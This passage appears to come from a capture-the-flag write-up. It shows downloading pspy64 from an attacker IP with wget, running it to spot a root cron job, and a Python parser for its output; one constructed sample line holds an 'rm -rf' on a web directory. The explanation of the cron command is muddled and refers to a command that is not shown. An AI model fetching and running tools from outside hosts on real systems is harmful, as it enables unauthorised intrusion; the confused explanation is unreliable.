PSPY
A root cronjob process was discovered
james@knife:/tmp$ wget http://10.10.14.2/pspy64 ; chmod 755 /tmp/pspy64
--2023-04-06 15:15:43-- http://10.10.14.2/pspy64
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.96M 1.18MB/s in 2.5s
2023-04-06 15:15:46 (1.18 MB/s) - ‘pspy64’ saved [3104768/3104768]
Delivery complete
james@knife:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
The root cronjob process is executing the command shown above. It appears to delete everything in the web root directory except for the index.php file.
This command is running a Ruby script called knife, which is a command-line tool for managing infrastructure and applications using the Chef configuration management system.
Specifically, this command asks Knife to list all of the data bags that exist on the Chef server. Data bags are a Chef feature that lets you store and manage arbitrary data, such as configuration settings or secrets, separately from your cookbooks.
The command uses the specific Ruby version bundled with Chef Workstation and disables any gems (libraries) that may be installed by default, to prevent conflicts with any other Ruby installation on the system.
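As an added example (not part of this writeup, and not pspy's own code), a small Python parser over constructed pspy "CMD:" lines that picks out the two signals used above to spot the cron job: commands that recur as UID 0 on a schedule, and root commands whose arguments touch the web root. The sample lines and paths are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample in pspy's CMD line format; timestamps, PIDs and paths are made up.
SAMPLE_PSPY_OUTPUT = """\
2023/04/06 15:16:01 CMD: UID=0     PID=2581   | /usr/sbin/CRON -f
2023/04/06 15:16:01 CMD: UID=0     PID=2582   | /bin/sh -c /root/delete.sh
2023/04/06 15:16:01 CMD: UID=0     PID=2583   | rm -rf /var/www/html/uploads
2023/04/06 15:16:02 CMD: UID=1000  PID=2590   | /tmp/pspy64
2023/04/06 15:17:01 CMD: UID=0     PID=2601   | /bin/sh -c /root/delete.sh
"""

# One pspy process event: "<date> <time> CMD: UID=<n> PID=<n> | <command line>"
CMD_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\| (?P<cmd>.*)$"
)


def parse_pspy(text):
    """Parse pspy CMD lines into dicts; non-matching lines (banner, config) are skipped."""
    events = []
    for line in text.splitlines():
        m = CMD_LINE.match(line)
        if m:
            d = m.groupdict()
            d["uid"] = int(d["uid"])
            d["pid"] = int(d["pid"])
            events.append(d)
    return events


def recurring_root_commands(events, min_count=2):
    """Commands seen at least min_count times as UID 0: candidates for scheduled jobs."""
    counts = Counter(e["cmd"] for e in events if e["uid"] == 0)
    return {cmd: n for cmd, n in counts.items() if n >= min_count}


def root_commands_touching(events, path_prefix):
    """UID-0 commands whose command line references the given path (e.g. the web root)."""
    return [e["cmd"] for e in events if e["uid"] == 0 and path_prefix in e["cmd"]]


if __name__ == "__main__":
    evs = parse_pspy(SAMPLE_PSPY_OUTPUT)
    print("recurring root commands:", recurring_root_commands(evs))
    print("root commands touching /var/www:", root_commands_touching(evs, "/var/www"))
```

On a real capture, pipe pspy's output to a file first (the banner and config lines are simply ignored by the regex) and raise min_count to match how long you watched.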